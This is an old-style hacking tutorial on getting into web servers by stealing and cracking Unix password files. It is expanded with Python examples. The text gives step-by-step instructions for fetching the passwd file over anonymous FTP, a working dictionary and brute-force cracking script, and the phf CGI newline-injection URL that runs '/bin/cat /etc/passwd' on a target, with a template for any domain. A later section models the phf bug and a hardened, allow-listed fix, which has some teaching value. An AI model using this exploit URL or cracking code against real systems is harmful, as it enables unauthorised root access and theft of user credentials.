Hacking Webpages

Getting The Password File Through FTP:
OK, one of the easiest ways to work toward super-user access on a web server is through anonymous FTP access: if the FTP area exposes the system's password file, you can download it and crack it offline. First, though, you need to learn a little about what the password file looks like.
Root:User:d7Bdg:1n2HG2:1127:20:superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh
This is an example of a regular (non-shadowed) password file. Each line is one account with seven colon-separated fields: username, encrypted password, UID, GID, full name, home directory and login shell. The part you care about is the superuser, the account with UID 0, because cracking its hash is what gives you root. Note that the first line above is malformed (its fields don't line up: the UID slot holds "d7Bdg", and root's UID should be 0), so use the TomJones and BBob lines as the model of a real entry. On a classic Unix system a crypt(3) hash is exactly 13 characters, two of salt followed by eleven of hash, like EUyd5XAAtv2dA; anything shorter is not a real hash.
root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp
This is another example of a password file, with one little difference: it's shadowed. On a shadowed system the password field holds only a placeholder and the actual encrypted passwords live in a separate file (/etc/shadow on most systems) that only root can read, so you can't view or copy the hashes. Without hashes, the password cracker and dictionary maker described below have nothing to work on.
Below is another example of a shadowed password file:
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false
Shadowed password files have an "x" in place of the password, or sometimes a "*" (a "*" or "!" in that field can also mean the account is locked and has no valid password at all). One more thing worth noticing in the file above: smtp has UID 0. Any account with UID 0 is root no matter what it is called, so don't only look at the line named root. Now that you know what the password file looks like, you should be able to tell a normal encrypted password file from a shadowed one, so we can go on to how to crack it.
Cracking a password file isn't as complicated as it seems, although the file format varies a little from system to system:

1) Take the password file: download or copy it.

2) Find a password cracker and a wordlist, or a dictionary maker to build one. Good crackers are not hard to find; Cracker Jack and John the Ripper are the classic ones, and John the Ripper also has an incremental (brute-force) mode. When you start the cracker it will ask for two things: the password file and a dictionary (wordlist) file. That is where the dictionary maker comes in. You can download one from nearly every hacker page on the net, and it generates every combination of the alphabet you choose (lowercase, uppercase, digits and other ASCII characters can all be added) up to a length you pick. Keep in mind how a cracker actually works: it encrypts each candidate word with the same salt as the stored hash and compares the result; it never "decrypts" the hash, which is why a good wordlist matters more than anything else.

3) Start the cracker and follow the directions it gives you.
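The whole procedure above, as an added example for this page (not code from the original post): parse a passwd file in the format shown, flag the shadowed and UID-0 entries, build candidates from a wordlist with simple mangling rules plus a short brute-force sweep, and try them against every hash the file does contain. The sample file and wordlist are constructed for the demo. The hash function is pluggable because real crypt(3) lives in Python's `crypt` module, which is deprecated and missing in newer releases; when it is absent a clearly labelled stand-in with the same two-character-salt-plus-digest shape is used instead.

```python
"""Parse a Unix password file, flag shadowed and UID-0 entries, then run a
dictionary attack against the hashes it does contain.

Added example, not the original post's code. Sample passwd lines and wordlist
are constructed. demo_hash is a stand-in for crypt(3), used when the
deprecated `crypt` module is unavailable; it is not a real password hash.
"""
import hashlib
import itertools

try:
    import crypt  # real crypt(3); removed in Python 3.13
except ImportError:
    crypt = None

PASSWD_FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")
SHADOW_MARKERS = ("x", "*", "!")  # hash is in /etc/shadow, or account is locked


def parse_passwd(text):
    """One dict per well-formed line; lines whose fields do not line up
    (wrong field count, or a non-numeric UID slot) are skipped."""
    entries = []
    for line in text.splitlines():
        fields = line.split(":")
        if not line or line.startswith("#") or len(fields) != 7 or not fields[2].isdigit():
            continue
        entry = dict(zip(PASSWD_FIELDS, fields))
        entry["uid"] = int(entry["uid"])
        entry["shadowed"] = entry["passwd"] in SHADOW_MARKERS
        entries.append(entry)
    return entries


def root_accounts(entries):
    """Every UID-0 account is root, whatever its name (like 'smtp:x:0:0' above)."""
    return [e["name"] for e in entries if e["uid"] == 0]


def demo_hash(word, salt):
    """Stand-in for crypt(3) (NOT a real password hash): two salt characters
    followed by an 11-character digest, 13 characters in all, like DES crypt."""
    salt = salt[:2]
    return salt + hashlib.sha256((salt + word).encode()).hexdigest()[:11]


def real_or_demo_hash(word, stored):
    """Hash `word` the way the stored hash was made. crypt.crypt accepts the whole
    stored hash as its salt argument, so this also covers $1$/$6$ style hashes."""
    return crypt.crypt(word, stored) if crypt else demo_hash(word, stored)


def mangle(word):
    """Cheap 'dictionary maker' rules: case variants, each with a trailing digit."""
    for base in (word, word.capitalize(), word.upper()):
        yield base
        for digit in "0123456789":
            yield base + digit


def brute_force_words(alphabet, max_len):
    """Every string over `alphabet` up to max_len characters (what the post calls a
    dictionary maker). Grows as len(alphabet)**max_len, so keep both small."""
    for n in range(1, max_len + 1):
        for combo in itertools.product(alphabet, repeat=n):
            yield "".join(combo)


def dictionary_attack(entries, candidates, hashfn=real_or_demo_hash):
    """Return {username: password}. Nothing is decrypted: each candidate is hashed
    with the target's own salt and compared against the stored value."""
    remaining = [e for e in entries if not e["shadowed"] and e["passwd"]]
    cracked = {}
    for word in candidates:
        if not remaining:
            break
        for e in list(remaining):
            if hashfn(word, e["passwd"]) == e["passwd"]:
                cracked[e["name"]] = word
                remaining.remove(e)
    return cracked


# Constructed sample in the post's format: a shadowed UID-0 account, a locked
# account, three crackable hashes, and the post's malformed "Root" line.
SAMPLE_PASSWD = "\n".join([
    "root:" + demo_hash("toor", "d7") + ":0:1:Superuser:/:/bin/csh",
    "smtp:x:0:0:mail daemon user:/:",
    "tomjones:" + demo_hash("Tom1", "p5") + ":1229:20:Tom Jones:/usr/people/tomjones:/bin/csh",
    "bbob:" + demo_hash("zebra", "EU") + ":1129:20:Billy Bob:/usr/people/bbob:/bin/csh",
    "ftp:*:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false",
    "Root:User:d7Bdg:1n2HG2:1127:20:superuser",
])
WORDLIST = ["password", "tom", "zebra", "billy"]  # constructed


def candidates(wordlist, alphabet="ort", max_len=4):
    """Mangled wordlist first (cheap), then a short brute-force sweep."""
    for word in wordlist:
        yield from mangle(word)
    yield from brute_force_words(alphabet, max_len)


def run_demo(hashfn=demo_hash):
    entries = parse_passwd(SAMPLE_PASSWD)
    return {
        "root": root_accounts(entries),
        "shadowed": [e["name"] for e in entries if e["shadowed"]],
        "cracked": dictionary_attack(entries, candidates(WORDLIST), hashfn),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

Two things the run shows that the steps above don't: the shadowed smtp account is root (UID 0) yet uncrackable from this file alone, and "Tom1" falls only because the mangling rules try capitalised words with a digit appended, which is the kind of rule a real cracker applies before any brute force.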
The PHF Technique:

The phf technique is by far the easiest way of getting a password file when it works, but it relies on an old bug in the phf CGI program that shipped with early NCSA httpd and Apache installs, so expect it to fail on most sites (it doesn't work about 95% of the time). To do the phf, all you do is open a browser and type in the following link:
http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
You replace webpage_goes_here with the domain, so if you were trying to get the password file for www.webpage.com you would type:
http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Why it works: phf handed the Qalias value to a shell command after escaping the usual shell metacharacters, but it forgot the newline character. %0a decodes to a newline, which ends phf's own command and lets everything after it (/bin/cat /etc/passwd, with %20 standing for the space) run as a second command under the web server's account. If the file that comes back is shadowed you'll only see x's, and asking for /etc/shadow instead won't help because the web server doesn't run as root.
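The mechanism just described, as an added example for this page rather than the phf source itself: a model of the deny-list escaper phf depended on (the metacharacter list reproduces the widely documented behaviour of NCSA's escape_shell_cmd(), which did not cover newline), the decoded Qalias value from the page's own URL, the two commands a shell would run, and a hardened replacement that allow-lists the input and builds an argument vector so no shell ever parses it. The ph command line is an approximation of what phf built, and nothing here executes a shell.

```python
"""Why the phf query string works: a model of the escape routine phf relied on,
and a hardened replacement.

Added example, not the phf source. ESCAPED_CHARS reproduces the documented
behaviour of NCSA's escape_shell_cmd() (no newline in the list); the ph
command line is an approximation. Nothing here runs a shell.
"""
import string
from urllib.parse import parse_qs, urlsplit

PHF_URL = "http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd"

# What the old escaper covered. Newline (0x0a) is not in the list.
ESCAPED_CHARS = set("&;`'\"|*?~<>^()[]{}$\\")


def escape_shell_cmd_phf(value):
    """Model of the buggy deny-list escaper: prefix listed characters with a backslash."""
    return "".join(("\\" + ch) if ch in ESCAPED_CHARS else ch for ch in value)


def qalias_from_url(url):
    """Decode Qalias the way the CGI saw it (%0a -> newline, %20 -> space)."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("Qalias", [""])[0]


def build_phf_command(alias):
    """Approximation of the shell command phf handed to popen()."""
    return "/usr/local/bin/ph -m alias=" + escape_shell_cmd_phf(alias)


def commands_shell_would_run(command_line):
    """/bin/sh treats an unescaped newline as a command separator; more than one
    element here means the attacker got a second command in."""
    return [part.strip() for part in command_line.split("\n") if part.strip()]


def phf_attack_result(url):
    """Commands the server would end up running for the given phf URL."""
    return commands_shell_would_run(build_phf_command(qalias_from_url(url)))


# Hardened version: allow-list the input and never go through a shell at all.
ALIAS_CHARS = set(string.ascii_letters + string.digits + "._-")


def alias_is_safe(value):
    return bool(value) and all(ch in ALIAS_CHARS for ch in value)


def build_ph_argv(alias):
    """Argument vector for subprocess.run(argv): no shell parses it, so a newline
    or ';' in `alias` would be plain bytes inside one argument, and the
    allow-list rejects them before that anyway."""
    if not alias_is_safe(alias):
        raise ValueError("rejected alias: %r" % alias)
    return ["/usr/local/bin/ph", "-m", "alias=" + alias]


if __name__ == "__main__":
    for cmd in phf_attack_result(PHF_URL):
        print("would run:", cmd)
    print("hardened argv:", build_ph_argv("tomjones"))
    try:
        build_ph_argv(qalias_from_url(PHF_URL))
    except ValueError as err:
        print(err)
```

The lesson generalises beyond phf: a deny-list of "dangerous" characters is only as good as its author's memory, while an allow-list plus an argv-style call (no shell) makes the missing-newline class of bug impossible rather than merely unlikely.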
Email: hackerblackbox@gmail.com
Thanks for your support.